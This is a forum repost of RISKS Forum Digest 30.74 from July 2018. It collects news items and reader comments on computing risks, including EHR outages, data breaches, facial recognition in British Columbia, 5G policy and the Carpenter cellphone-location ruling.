    ------------------------------

    Date: Tue, 3 Jul 2018 08:39:56 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Wikipedia Italy Blocks All Articles in Protest of EU's Ruinous
    Copyright Proposals (Gizmodo)

    NNSquad
    http://gizmodo.com/wikipedia-italy-blocks-all-articles-in-protest-of-eus-r-1827312550

    On Tuesday, Wikipedia Italy set all of its pages to redirect to a
    statement raising awareness for the upcoming vote that (barring some
    legislative wrangling) would make the copyright directive law. The
    statement reads, in part (emphasis theirs): On July 5, 2018, The Plenary
    of the European Parliament will vote whether to proceed with a copyright
    directive proposal which, if approved, will significantly harm the
    openness of the Internet. The directive instead of updating the copyright
    laws in Europe and promoting the participation of all the citizens to the
    society of information, threatens online freedom and creates obstacles to
    accessing the Web, imposing new barriers, filters and restrictions. If the
    proposal would be approved in its current form, it could be impossible to
    share a news article on social networks, or find it through a search
    engine; Wikipedia itself would be at risk.

    Just a taste of what's coming to European Internet users if those laws
    are enacted.

    ------------------------------

    Date: Mon, 2 Jul 2018 23:45:55 -0400
    From: ``Fr. Stevan Bauman'' <father...@indy.net>
    Subject: How a Major Computer Crash Showed the Vulnerabilities of EHRs
    (Medscape)

    Marcia Frellick, Medscape, 14 Jun 2018
    http://www.medscape.com/viewarticle...PEDIT_hospmed&uac=64984BJ&impID=1667063&faf=1

    The recent communications outage at Sutter Health, the largest health system
    in northern California, which cut off access to electronic health records
    (EHRs), highlighted the frequency of such outages and the need for backup
    plans and drills nationwide. [...]

    Andrew Gettinger, MD, chief clinical officer for the Office of the National
    Coordinator for Health Information Technology, part of the US Department of
    Health and Human Services, said all systems need backup plans and pointed to
    the recommendation from the Joint Commission for annual disaster drills.

    ``It's not a question of IS your system going to be unavailable, because I
    think almost every computer system in every context is at some time or
    another not available,'' he told /Medscape Medical News/. ``The question is
    then -- what's the institutional contingency plan?''

    Gettinger said that downtime for computer systems is not unlike other
    disasters health systems plan for regularly. ``It's no different from what
    happens when the power in the building goes out or the water supply goes out
    or you're no longer able to get compressed oxygen or nitrous oxide. I don't
    think patients or doctors really need to be worried about it unnecessarily.''

    All health systems should know about the SAFER guides
    <https://www.healthit.gov/topic/safety/safer-guides>
    (Safety Assurance Factors for EHR Resilience), put in place to address EHR
    safety nationally, Gettinger said. The guides were updated last year.

    Dean Sittig, PhD, a professor at the University of Texas Health's School of
    Biomedical Informatics, helped write those guidelines and also was lead
    author on a study in 2014 <https://www.ncbi.nlm.nih.gov/pubmed/25200197>
    that surveyed US-based healthcare institutions that were part of a
    professional collaborative on their exposure to downtime.

    In that study, researchers found that nearly all (96%) of the 50 large,
    integrated institutions who responded had at least one unplanned downtime in
    the past 3 years and 70% had at least one unplanned downtime greater than 8
    hours in the past 3 years. [...]

    In another paper
    http://www.nejm.org/doi/full/10.1056/NEJMsb1205420
    Sittig wrote that, in April 2010, one third of the hospitals in Rhode Island
    had to delay elective surgeries and divert some patients when an automatic
    antivirus update crashed the system.

    ``You depend on the computer for everything -- registration, scheduling, past
    visit notes, results of laboratory tests. The healthcare system is now
    dependent on the electronic health record to care for patients,'' Sittig told
    /Medscape Medical News/.

    In the Sutter case, a fire-suppression system was activated. Sittig
    explained that the suppressions systems in data centers typically involve an
    alarm going off to alert people to get out of the room, then doors lock and
    all the oxygen is sucked out of the room and replaced with fire-retardant
    gas.

    Because the gas has to be flushed out, then the oxygen levels restored, then
    the computers restarted, ``you're talking probably a minimum of 4-6 hours,''
    Sittig says. ``That's when everything works perfectly.'' He said systems
    should expect accidents to happen and that they will be costly. ``A big
    hospital probably loses at least $1 million per hour when they're down,''
    Sittig said.

    But investments in data protection can be a hard sell. A chief financial
    officer, Sittig said, may say a $3 million backup data center is too
    expensive, for example.

    ``You have to ask them, 'Can you afford to be down 5 hours? That will cost us
    $5 million. So we should spend the $3 million as an insurance policy,' ''
    Sittig said.

    Adding to the problem, he said, is that in the modern healthcare system,
    with an institution that's been using an EHR 5 or more years, many young
    providers have never worked in a place that has a paper system and aren't
    familiar with those operations.

    Sittig added that paper systems are subject to their own dangers -- fire,
    water, and wind, for example.

    But electronic records that make it easy to spread information instantly
    across hospitals, sometimes in many states, also can mean instant, massive
    failures.

    The first thing hospital systems do when a disaster strikes, Sittig says, is
    decide what can be cut, and the first thing to go is usually the elective
    surgeries. Then ambulances may be instructed to take patients elsewhere.
    ``Then you try to discharge the people who aren't very sick. Then they start
    sending people home early. We've created a system where we're relying on an
    electromechanical device that we know is going to break. There's no question
    computers are going to break.''

    ------------------------------

    Date: Sat, 30 Jun 2018 23:13:48 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Apple 'Family Sharing' feature used by scammers to make purchases
    with hacked Apple IDs (Business Insider)

    People are discovering that scammers are controlling their Apple accounts
    using a feature for families to share apps

    When David tried to download apps on his iPhone and iPad recently, he found
    he wasn't able to because his account was linked to something called *Family
    Sharing*.

    That's a feature that Apple introduced in 2014 to make it easier to share
    apps, iCloud storage, and iTunes content like music and movies with up to
    five family members.

    But this was news to David, who says he didn't remember turning on Family
    Sharing. After he dug into his account settings, he received a popup that to
    remove himself from the Family Sharing account he needed to contact a name
    that was in Chinese -- and he had no way to get in touch.

    http://www.businessinsider.com/appl...mers-to-make-purchases-hacked-accounts-2018-6

    ------------------------------

    Date: Tue, 03 Jul 2018 18:50:25 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: ``Trump administration tells FCC to block China Mobile from U.S.''
    (Corinne Reichert)

    Corinne Reichert, ZDNet, 3 Jul 2018
    Mobile access to U.S. telecommunications networks would carry a `substantial
    and unacceptable risk' to national security and law enforcement, the U.S.
    government has said.
    http://www.zdnet.com/article/trump-administration-tells-fcc-to-block-china-mobile-from-us/

    selected text:

    The Federal Communications Commission (FCC) has been advised by the
    Executive Branch to deny China Mobile entry to the United States
    telecommunications industry, citing ``substantial and unacceptable risk to US
    law enforcement and foreign intelligence collection''.

    The Executive Branch, which includes the Departments of Justice, Homeland
    Security, Defense, State, and Commerce, along with the Offices of Science
    and Technology Policy and the US Trade Representative, made the
    recommendation almost seven years after China Mobile International (USA)
    made the application for a certificate under s214 of the Communications Act.

    A 2013 letter [PDF] from counsel for China Mobile USA had noted the ``extreme
    delay'' in granting the licence -- which was originally applied for in
    September 2011 -- saying the delay ``is causing significant and unwarranted
    harm to China Mobile USA's business operations''.

    Huawei Australian chair John Lord last week said the Chinese technology
    giant is the most audited, inspected, reviewed, and critiqued IT company in
    the world, and has never had a national security issue.

    ``After every kind of inspection, audit, review, nothing sinister has
    been found. No wrongdoing, no criminal action or intent, no 'back
    door', no planted vulnerability, and no 'magical kill switch'. In
    fact, in our three decades as a company no evidence of any sort has
    been provided to justify these concerns by anyone -- ever.''

    ------------------------------

    Date: Sat, 30 Jun 2018 13:41:59 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: Google is training machines to predict when a patient will die
    (Los Angeles Times)

    http://www.latimes.com/business/tec...l-intelligence-healthcare-20180618-story.html

    ``What impressed medical experts most was Google's ability to sift through
    data previously out of reach: notes buried in PDFs or scribbled on old
    charts. The neural net gobbled up all this unruly information then spat
    out predictions. And it did so far faster and more accurately than
    existing techniques. Google's system even showed which records led it to
    conclusions.

    ``Dean envisions the AI system steering doctors toward certain medications
    and diagnoses. Another Google researcher said existing models miss obvious
    medical events, including whether a patient had prior surgery. The person
    described existing hand-coded models as `an obvious, gigantic roadblock'
    in healthcare. The person asked not to be identified discussing work in
    progress.

    ``For all the optimism over Google's potential, harnessing AI to improve
    healthcare outcomes remains a huge challenge. Other companies, notably
    IBM's Watson unit, have tried to apply AI to medicine but have had limited
    success saving money and integrating the technology into reimbursement
    systems.''

    The perfect *death panel* proxy, and no longer a burden to physicians,
    bioethicists, insurance agents, hospital administrators, and patient
    advocates, Google's Medical Brain AI platform calculates a human life's
    merit score.

    Can this platform factor patient quality of life outcome potential into the
    learning algorithm's neural network processing decisions? What weight would
    this factor possess relative to the others? Under what medical conditions is
    this platform relevant to even consult? What happens if a test result
    applied as an input, such as for blood chemistry, is skewed by a
    contaminated reagent?

    Until proven to improve health care outcomes, if ever, a "blackbox
    warning label'' seems like a wise precaution.
    http://en.wikipedia.org/wiki/Boxed_warning.

    Will Google's Medical Brain employees and immediate family members be
    required to participate in a randomize control trial using the Medical Brain
    AI platform?

    ------------------------------

    Date: July 4, 2018 at 10:18:15 AM GMT+9
    From: Dewayne Hendricks <dew...@warpspeed.com>
    Subject: So What The Heck Does 5G Actually Do? And Is It Worth What The Carriers
    Are Demanding? (Harold Fel)

    Harold Fel, WetMachine, 28 Jun 2018

    http://www.wetmachine.com/tales-of-...-is-it-worth-what-the-carriers-are-demanding/

    It's become increasingly impossible to talk about spectrum policy without
    getting into the fight over whether 5G is a miracle technology that will end
    poverty, war and disease or an evil marketing scam by wireless carriers to
    extort concessions in exchange for magic beans. Mind you, most people never
    talk about spectrum policy at all -- so they are spared this problem in the
    first place. But with T-Mobile and Sprint now invoking 5G as a central
    reason to let them merge, it's important for people to understand precisely
    what 5G actually does. Unfortunately, when you ask most people in Policyland
    what 5G actually does and how it works, the discussion looks a lot like the
    discussion in Hitchhikers Guide To the Galaxy where Deep Thought announces
    that the answer to Life the Universe and Everything is `42'.

    So while not an engineer, I have spent the last two weeks or so doing a deep
    dive on what, exactly does 5G actually do -- with a particular emphasis on
    the recently released 3GPP standard (Release 15) that everyone is
    celebrating as the first real industry standard for 5G. My conclusion is
    that while the Emperor is not naked, that is one Hell of a skimpy thong he's
    got on.

    More precisely, the bunch of different things that people talk about when
    they say `5G': millimeter wave spectrum, network slicing, and something
    called (I am not making this up) `flexible numerology' are real. They
    represent improvements in existing wireless technology that will enhance
    overall efficiency and thus add capacity to the network (and also reduce
    latency). But, as a number of the more serious commentators (such as Dave
    Burstien over here) have pointed out, we can already do these things using
    existing LTE (plain old 4G). Given the timetable for development and
    deployment of new 5G network technology, it will be at least 5 years before
    we see more than incremental improvement in function and performance.

    Put another way, it would be like calling the adoption of a new version of
    Wi-Fi `C5G Wi-Fi.' (Which I am totally going to do from now on, btw, because
    why not?)

    I elaborate more below . . .

    There are a bunch of important questions to keep in mind when evaluating
    what we ought to do about 5G as a policy question. (a) What exactly is 5G?
    (b) How does it compare to existing LTE? and, (c) How much are we being
    asked to pay for it in policy terms?

    What Exactly Do We Mean By CG

    CG technically means `generation'. My favorite explanation can be found in
    this old Best Buy commercial. As a general rule, we use `G' to indicate a
    significant shift in capability, architecture and technology. For example,
    the shift from analog to digital voice in 2G, or the inclusion of limited
    data capability as an overlay to voice in 3G. The shift to 4G was marked by
    a shift to an all packet-switched data network in which voice is supported
    as one feature on the network. In addition, 4G turned out to be fairly
    homogeneous for a variety of reasons I won't get into now. Basically, after
    a brief flirtation by Sprint and a few others with WiMax, all the carriers
    ended up using LTE.

    So the switch to 5G ought to mean a major boost in both technology and
    speed. And it will, eventually. But for now, it's not so much a generational
    shift like the previous shifts but a modest transition over time. By that I
    don't mean simply that we will see 5G networks operating with 4G cores for a
    long time. That's always true. Carriers deployed LTE and still maintained
    (some to this day) 3G networks in parallel. That is necessary so that people
    and businesses can switch legacy equipment at a rational pace. What I mean
    is that the capabilities that are supposed to make 5G so awesome are not
    really that awesome right now, and won't be for at least 5 more years.

    What Makes 5G More Awesome?

    Here is where it gets confusing. You can see a good tutorial on the network
    architecture here. But this represents a relatively recent change in how we
    talk about 5G. Originally, i.e., back in 2015, we were talking about
    millimeter wave as 5G, with nothing else going on in the lower frequencies
    counting as 5G. [...]

    ------------------------------

    Date: Tue, 3 Jul 2018 20:29:22 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Leaks, riots, and monocles: How a $60 in-game item almost destroyed
    EVE Online (Ars Technica)

    When the developers of EVE Online added expensive in-game vanity items... it
    went poorly.

    http://arstechnica.com/gaming/2018/07/monocles/

    ------------------------------

    Date: Mon, 02 Jul 2018 11:54:05 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: Gaming disorder is only a symptom of a much larger problem (WaPo)

    [Suitably revised, this submission might make a good April Fool's comp.risks
    contribution in 2019. And jolt a few CxOs from their Caesar salad lunch. od
    -c output attached below for peace of mind.]

    http://www.washingtonpost.com/opinions/gaming-disorder-is-only-a-symptom-of-a-much-larger-problem/2018/06/29/64f2866a-7a21-11e8-93cc-
    6d3beccdd7a3_story.html


    Mobile electronic devices generate addiction symptoms that mirror those
    caused by nicotine. The iGen -- young people raised on smart phones and
    social media -- are especially vulnerable to screen addiction disorder.

    Would an enterprising state attorney general attempt the equivalent of a
    ``Tobacco Master Settlement Agreement''
    http://en.wikipedia.org/wiki/Tobacco_Master_Settlement_Agreement) against
    mobile device manufacturers, application developers, and social media for
    public health expenditures arising from treatment?

    >From the MSA wikipedia page:

    ``The general theory of these lawsuits was that the cigarettes produced by
    the tobacco industry contributed to health problems among the population,
    which in turn resulted in significant costs to the states' public health
    systems.''

    Recall that the Tobacco MSA amounted to settlement payments from tobacco
    firms for ~$US 200-375B over 25 years to reimburse states for expenses
    arising from tobacco-related illness and disease treatment. The MSA also
    imposed restrictions that prohibited tobacco advertisements toward young
    people -- a core audience for addictive products, and a business model
    impediment that penalizes income capture potential.

    Hypothetically, would substitution of ``mobile devices, apps, and social
    media'' for ``tobacco'' (the MOBASS MSA?) in an equivalent agreement be viable?
    The epidemiological evidence, per states' public health system impact to
    date, might not immediately substantiate this extrapolation. As evidence
    linking tobacco usage to illness accumulated from the 1950s through 1990s,
    so might evidence of screen addiction disorder and the affects it
    introduces.

    The spectacle of mobile device, social media, and application vendors called
    to testify under oath before Congress that ``our products are not addictive''
    would rival the perjury committed by tobacco industry executive
    predecessors. Michael Mann's ``The Insider''
    http://www.imdbcom/title/tt0140352/?ref_=nv_sr_2) might need a sequel!

    ------------------------------

    Date: Sun, 1 Jul 2018 22:43:10 +0100
    From: Michael Kent <michae...@37.org.uk>
    Subject: Ticketmaster: How not to manage customers after a data breach.

    Like many in the UK I was contacted by Ticketmaster to let me know that my
    data might have been accessed through malicious software on the servers of a
    third party service provider. They have very kindly offered me a years free
    identity monitoring by Experian.

    The issue? The email tells me to sign up by...

    "Visit the Data Patrol website to get started:
    http://my.garlik.com/garlik-ui/expnuk/login
    http://click.customerservice.tmm.ticketmaster.co.uk ...

    Not a Ticketmaster site, not an Experian site, just a site that screams
    ***SCAM***!!!

    A minute or two googling tells me that this is probably the legitimate
    service provider but this really isn't how to give customers confidence that
    you take security seriously!

    ------------------------------

    Date: Mon, 2 Jul 2018 15:24:10 -0400
    From: Kelly Bert Manning <bo...@freenet.carleton.ca>
    Subject: Re: Police, Law Enforcement, and corporate use of facial
    recognition and facial images in court (RISKS-30.73)

    This has been used in British Columbia for a decade, has proved quite
    effective, and is pretty much settled case law in both Criminal and Civil
    cases.

    In BC Driver Licencing and BC Service Card issuing for the BC Medical
    Services Plan have been offloaded out of core government to a Crown
    Corporation, the Insurance Corporation of BC. Photo ID Service Cards for MSP
    are a relatively new development. The Original BC ``Care Cards'' did not have
    photos and involved little or no verification of the identity of who they
    were issued to. BC Residents have the option of combining the BC Service
    Card and BC Driver's Licence into one card, or having separate cards. Most
    Privacy Professionals I have discussed this with chose to to have separate
    cards. I have overnight dialysis in a clinic 3 times a week, so I just take
    my BC Service Card and a transit pass with me.

    The BC Liquor Control Board used to issue its own Photo ID cards, decades
    ago, but those were also offloaded onto ICBC as ``BC ID Cards'' for people who
    did not have a BC Driver's Licence, such as a former premier who surrendered
    his DL after being caught driving under the influence in Hawaii.

    There have been at least two widely reported instances where Facial
    Recognition has been used to trigger investigations, or to identify
    criminals from photos.

    After the 2011 Stanley Cup Riot in Vancouver ICBC offered to scan its Facial
    Image DB, using the same recognition software that ICBC began using in 2008,
    without notice to customers, to detect attempts at Driver's Licence
    Fraud. ICBC had a vested interest in identifying the Rioters who damaged or
    destroyed automobiles insured by ICBC and later sued at least 46 people in
    Civil Actions. Facial Images flagged as possible Fraud attempts are reviewed
    by Police, not by ICBC employees. Bio-metric factors as height, weight, and
    eye colour are also used in the matching, not just Facial Recognition.

    http://www.burnabynow.com/news/six-burnaby-defendants-in-icbc-stanley-cup-riot-civil-suit-1.1896960

    BC Information and Privacy Commissioner Elizabeth Denham ruled that ICBC
    could only do that with due process. Police turned to the Internet and
    crowd sourced identification of the rioters from pictures posted on the
    web. That turned out to be very effective, resulting in tips about the names
    of hundreds of rioters. Human eyes still beat facial recognition?

    http://www.macleans.ca/news/last-two-stanley-cup-rioters-sentenced-to-time-behind-bars-for-assault/

    ``Prosecutors laid 912 charges against 300 suspects, and 284 people pleaded
    guilty. Another six had the charges against them stayed, while 10 went to
    trial, resulting in nine convictions and one acquittal.''

    Elizabeth Denham is now the UK Data Commissioner responsible for
    investigating the Cambridge Analytica scandal.

    http://www.cbc.ca/news/canada/briti...facial-recognition-to-track-rioters-1.1207398

    http://www.oipc.bc.ca/investigation-reports/1245

    Executive Summary [8] ``I conclude that ICBC must immediately cease
    responding to requests from police to use the facial recognition database
    for the purposes of identifying individuals for police absent a subpoena,
    warrant or court order.''

    ICBC's undisclosed use of Facial Recognition to detect attempts at DL Fraud
    became public knowledge when RCMP arrived at a Government Office in Victoria
    to arrest a Civil Servant who had a meteoric rise under the name Richard
    Perran. That turned out to be a family affair, with his wife also working in
    the BC Public Service Under a stolen identity. He had also obtained a Public
    Service subsidized Master's Degree from the University of Victoria, and
    tried to leverage that into at PhD under the stolen name after being
    convicted, despite being ordered to stop using the stolen name as a
    condition of sentencing and probation.

    http://www.timescolonist.com/icbc-f...altering-record-to-get-government-job-1.21668
    http://bctrialofbasi-virk.blogspot.com/2009/12/police-probe-hiring-of-bc-civil-servant.html
    http://www.pressreader.com/canada/times-colonist/20120617/281479273491097

    ------------------------------

    Date: Mon, 2 Jul 2018 16:00:39 -0400
    From: Kelly Bert Manning <bo...@freenet.carleton.ca>
    Subject: Re: Florida skips gun background checks for a year after employee
    forgets login (RISKS-30.72,73)

    Did Security Administrators at the National Instant Criminal Background
    Check System (NICS) detect the fact that IDs were not being used and ask why
    the users were not using assigned IDs? If so did they pursue that with
    management in the Florida Department of Agriculture and Consumer Service?
    The report cited in RISKS says that the Florida OIG detected the issue.

    I was a top-level RACF Security Admin for the BC Ministry of Health from
    1980 until 2016, first in the BC Public Service and later as a Contracted
    Resource working for a world scale IT Services company with its HQ in
    Montreal.

    One of the auto generated routine reports that I had to review was a report
    of IDs that had expired passwords because the User had not changed the
    password for more than 60 days.

    Last-Use Date was also tracked.

    Part of my job was repeatedly nagging user supervisors about whether the
    person the ID was issued to was still working in a position that required
    access, based on the expired password and the last use date.

    Repeating the query at regular intervals was part of my job even though it
    tended to make me seem like a broken record.

    Responding to requests for new user IDs was something I used to revisit the
    matter. That is, why did the area need a new user ID when it had been issued
    positional IDs that had not been used in years, or even decades.

    Positional IDs are associated with a specific job function.

    If a user leaves, or changes job roles they get a new ID associated with the
    new role. The old ID should be reassigned deactivated, or deleted as part of
    that transition.

    ------------------------------

    Date: Tue, 5 May 2018 11:11:11 -0800
    From: RISKS-...@csl.sri.com
    Subject: Abridged info on RISKS (comp.risks)

    The ACM RISKS Forum is a MODERATED digest. Its Usenet manifestation is
    comp.risks, the feed for which is donated by panix.com as of June 2011.
    => SUBSCRIPTIONS: The mailman Web interface can be used directly to
    subscribe and unsubscribe:
    http://mls.csl.sri.com/mailman/listinfo/risks

    => SUBMISSIONS: to ri...@CSL.sri.com with meaningful SUBJECT: line that
    includes the string `notsp'. Otherwise your message may not be read.
    *** This attention-string has never changed, but might if spammers use it.
    => SPAM challenge-responses will not be honored. Instead, use an alternative
    address from which you never send mail where the address becomes public!
    => The complete INFO file (submissions, default disclaimers, archive sites,
    copyright policy, etc.) is online.
    <http://www.CSL.sri.com/risksinfo.html>
    *** Contributors are assumed to have read the full info file for guidelines!

    => OFFICIAL ARCHIVES: http://www.risks.org takes you to Lindsay Marshall's
    searchable html archive at newcastle:
    http://catless.ncl.ac.uk/Risks/VL.IS --> VoLume, ISsue.
    Also, ftp://ftp.sri.com/risks for the current volume
    or ftp://ftp.sri.com/VL/risks-VL.IS for previous VoLume
    If none of those work for you, the most recent issue is always at
    http://www.csl.sri.com/users/risko/risks.txt, and index at /risks-30.00
    Lindsay has also added to the Newcastle catless site a palmtop version
    of the most recent RISKS issue and a WAP version that works for many but
    not all telephones: http://catless.ncl.ac.uk/w/r
    ALTERNATIVE ARCHIVES: http://seclists.org/risks/ (only since mid-2001)
    <http://the.wiretapped.net/security/info/textfiles/risks-digest/>
    *** NOTE: If a cited URL fails, we do not try to update them. Try
    browsing on the keywords in the subject line or cited article leads.
    Apologies for what Office365 and SafeLinks have done to URLs. I have
    tried to extract the essence.
    ==> Special Offer to Join ACM for readers of the ACM RISKS Forum:
    <http://www.acm.org/joinacm1>

    ------------------------------

    End of RISKS-FORUM Digest 30.74
    ************************
     
  9. LakeGator

    LakeGator Mostly Harmless Moderator VIP Member

    4,755
    483
    283
    Apr 3, 2007
    Tampa
    Risks Digest 30.74

    RISKS List Owner

    Jul 5, 2018 3:12 PM

    Posted in group: comp.risks

    RISKS-LIST: Risks-Forum Digest Thursday 5 July 2018 Volume 30 : Issue 74

    ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
    Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

    ***** See last item for further information, disclaimers, caveats, etc. *****
    This issue is archived at <The Risks Digest> as
    <The Risks Digest>
    The current issue can also be found at
    <http://www.csl.sri.com/users/risko/risks.txt>

    Contents:
    Cyber-researchers Don't Think Feds or Congress Can Protect Against
    Cyberattacks (Defense One)
    Babylon claims its chatbot beats GPs at medical exam (bbc.com)
    Medical device security: Hacking prevention measures (HPE)
    Exactis said to expose 340-million records, more than Equifax breach (CNET)
    Supreme Court requires warrant for cellphone location data (Henry Baker)
    ICE hacked its algorithmic risk-assessment tool, so it recommended
    detention for everyone (BoingBoing)
    Energy company vulnerability allows access to customer accounts
    (Donald Mackie)
    Internet TV firmware update/soft powerswitch failure (Richard M Stein)
    Widespread Google Home outage: What NOT to do! (Lauren Weinstein)
    Cruel pranksters made NYC Internet kiosks play ice-cream truck tunes
    (Engadget)
    Swann home security camera sends video to wrong user (BBC)
    Hidden Microsoft Office 365 data gathering (LMG Security)
    Protecting civilians in cyberspace (Just Security)
    Rash of Fortnite cheaters infected by malware that breaks HTTPS
    encryption (Ars Technica)
    Really dumb malware targets cryptocurrency fans using Macs (Ars Technica)
    Sony Blunders By Uploading Full Movie to YouTube Instead of Trailer
    (TorrentFreak)
    Homeland Security subpoenas Twitter for data breach finder's account
    (Zack Whittaker)
    Wikipedia Italy Blocks All Articles in Protest of EU's Ruinous
    Copyright Proposals (Gizmodo)
    How a Major Computer Crash Showed the Vulnerabilities of EHRs (Medscape
    via Fr. Stevan Bauman)
    Apple 'Family Sharing' feature used by scammers to make purchases
    with hacked Apple IDs (Business Insider)
    ``Trump administration tells FCC to block China Mobile from U.S.''
    (Corinne Reichert)
    Google is training machines to predict when a patient will die
    (Los Angeles Times)
    So What The Heck Does 5G Actually Do? And Is It Worth What The Carriers
    Are Demanding? (Harold Fel)
    Leaks, riots, and monocles: How a $60 in-game item almost destroyed
    EVE Online (Ars Technica)
    Gaming disorder is only a symptom of a much larger problem (WaPo)
    Ticketmaster: How not to manage customers after a data breach.
    (Michael Kent)
    Re: Police, Law Enforcement, and corporate use of facial recognition
    and facial images in court (Kelly Bert Manning)
    Re: Florida skips gun background checks for a year after employee
    (Kelly Bert Manning)
    Abridged info on RISKS (comp.risks)

    ----------------------------------------------------------------------

    Date: Wed, 27 Jun 2018 20:52:12 PDT
    From: Peter G Neumann <neu...@csl.sri.com>
    Subject: Cyber-researchers Don't Think Feds or Congress Can Protect Against
    Cyberattacks (Defense One)

    Cyber Researchers Don’t Think Feds or Congress Can Protect Against Cyberattacks

    Quite evidently, the U.S. government has little clue about defending itself
    against cybersecurity attacks, and is consequently unprepared for any
    digital disasters.

    ------------------------------

    Date: Sat, 30 Jun 2018 10:28:47 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: Babylon claims its chatbot beats GPs at medical exam (bbc.com)

    [od -c output attached for peace of mind]

    Chatbot claims to beat GPs at medical exam

    ``Claims that a chatbot can diagnose medical conditions as accurately as a
    GP have sparked a row between the software's creators and UK doctors.''

    Babylon's chatbot claims to out-achieve carbon-based physicians on the
    UK MRCGP (Membership Royal College of General Practitioners)
    examination. Babylon advocates their AI platform to complement a
    physician's judgment, not as a wholesale replacement.

    ``Babylon said that the first time its AI sat the exam, it achieved a
    score of 81%. It added that the average mark for human doctors was 72%,
    based on results logged between 2012 and 2017. But the RCGP said it had
    not provided Babylon with the test's questions and had no way to verify
    the claim.''

    Given commercial aspirations, and the skyward trajectory of health care
    service delivery, an attempt to capitalize on a ''cost-effective'' AI-based
    alternative is likely. Favorable legislation, and weak regulatory oversight,
    will induce businesses to pursue them despite potential public health risks.

    A randomized control trial must be performed. Any business that promotes and
    sells these AI diagnosis/treatment services must be required to enroll their
    own employees and immediate family members as participants. The trial
    outcome reviewers must be free from conflict of interest.

    ------------------------------

    Date: Mon, 2 Jul 2018 15:37:04 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Medical device security: Hacking prevention measures (HPE)

    With so many lives at stake, computer scientists and healthcare IT pros are
    motivated to develop strategies that keep patients safe from medical device
    hackers. They're making progress.

    Medical device security: Hacking prevention measures

    ------------------------------

    Date: Wed, 27 Jun 2018 18:50:14 -0400
    From: Richard Forno <rfo...@infowarrior.org>
    Subject: Exactis said to expose 340-million records, more than Equifax breach
    (CNET)

    Exactis said to have exposed 340 million records in massive leak

    We hadn't heard of the firm either, but it had data on hundreds of millions
    of Americans and businesses and leaked it, according to Wired.

    Abrar Al-Heeti
    June 27, 2018 2:14 PM PDT

    If you're a US citizen, your personal information -- your phone number, home
    address, email address, even how many children you have -- may have just
    become easily available to hackers in an alleged massive data leak.

    Florida-based marketing and data aggregation firm Exactis exposed a database
    containing nearly 340 million individual records on a publicly accessible
    server, Wired reported. Earlier this month, security researcher Vinny Troia
    found that nearly 2 terabytes of data was exposed, which seems to include
    personal information on hundreds of millions of US adults and millions of
    businesses, the report said.

    ``It seems like this is a database with pretty much every US citizen in it,''
    Troia told Wired.

    Exactis didn't immediately respond to a request for comment or confirmation.

    The alleged breach reportedly exposed highly personal information, such as
    people's phone numbers, home and email addresses, interests and the number,
    age and gender of their children. Credit card information and Social
    Security numbers don't appear to have been leaked. Troia told Wired that he
    doesn't know where the data is coming from, ``but it's one of the most
    comprehensive collections I've ever seen.''

    Because Exactis hasn't confirmed the leak, it's hard to know exactly how
    many people are affected. But Troia found two versions of the database that
    each had around 340 million records, with roughly 230 million on consumers
    and 110 million on business contacts, according to Wired. Exactis says on
    its website that it has over 3.5 billion consumer, business and digital
    records.

    The data leak is noteworthy not only for its breadth, but also for the depth
    of information the records have on people. Every record reportedly has
    entries that include more than 400 variables on characteristics like whether
    the person smokes, what their religion is and whether they have dogs or
    cats. But Wired noted that in some instances, the information is inaccurate
    or outdated.

    Just because people's financial information or Social Security numbers
    weren't leaked doesn't mean they're not at risk for identity theft. The
    amount of personal information that was exposed could still help scammers
    impersonate or profile them.

    Huge compromises to personal information have been making headlines
    lately. In 2017, Equifax was involved in a massive data breach of 145.5
    million people's data. And in October, Yahoo revealed that all 3 billion
    accounts were hacked in a 2013 breach.

    ------------------------------

    Date: Mon, 25 Jun 2018 07:09:23 -0700
    From: Henry Baker <hba...@pipeline.com>
    Subject: Supreme Court requires warrant for cellphone location data

    Nice to see that the ``Third Party Doctrine'' -- which gave the govt ``most
    favored nation status'' w.r.t. your data -- is finally being chipped away.

    However, as this law professor points out, this decision will have little
    practical effect.

    [Sorry for the length of this posting, but every point is salient.]

    The latest Supreme Court decision is being hailed as a big victory for digital privacy. It’s not.

    The latest Supreme Court decision is being hailed as a big victory for
    digital privacy. It's not.

    Carpenter forces police to get a warrant before getting some cellphone
    data. But other Fourth Amendment cases will undermine its impact.

    By Aziz Huq Updated Jun 23, 2018, 7:43am EDT

    Congratulations -- a closely divided US Supreme Court has just ruled in
    Carpenter v. United States that you have a constitutional right to privacy
    in the locational records produced by your cellphone use. Law enforcement
    now cannot ask Sprint, AT&T, or Verizon, for cell tower records that reveal
    your whereabouts through your phone's interaction with those towers, at
    least without a warrant.

    Carpenter builds on two earlier decisions. In 2011, the Court required a
    warrant before police placed a GPS tracker on a vehicle to track its
    movements. In 2014, it forbade warrantless searches of cellphone during
    arrests. Whatever it's other flaws, the Roberts Court thus seems to
    understand electronic privacy's importance.

    But there are a couple of things to know before toasting the Court's high
    regard for privacy in the digital age. The Roberts Court, building on what
    the preceding Rehnquist Court did, has created an infrastructure for Fourth
    Amendment law that makes it exceptionally easy for police to do a search,
    even when a warrant is required. The law also makes it exceptionally
    difficult for citizens to obtain close judicial oversight, even when the
    police have violated the Constitution. As a result of these background
    rules, even a decision as seemingly important as Carpenter is unlikely to
    have any dramatic effect on police practices.

    It's not just that our digital privacy is insufficiently protected, in other
    words. It's that our Fourth Amendment rights and remedies in general have
    been eroded. Once enough holes have been poked in the general system for
    vindicating Fourth Amendment interests, the decision to extend Fourth
    Amendment coverage to a new domain -- such as cell-site locational data --
    is just not terribly significant.

    Timothy Ivory Carpenter had been convicted of nine armed robberies based on
    witness testimony, but the prosecution also stressed in its closing argument
    records obtained from his cellphone company. Those records showed how
    Carpenter's phone interacted with the cell phone towers that carried its
    signal. As Chief Justice Roberts emphasized, the records painted a detailed
    picture of Carpenter's movements over 127 days.

    Yet the government did not use a warrant based on probable cause to obtain
    those cell-site records, relying instead on a statute called the Stored
    Communications Act.

    Forcing police to get a warrant is not much of a protection these days

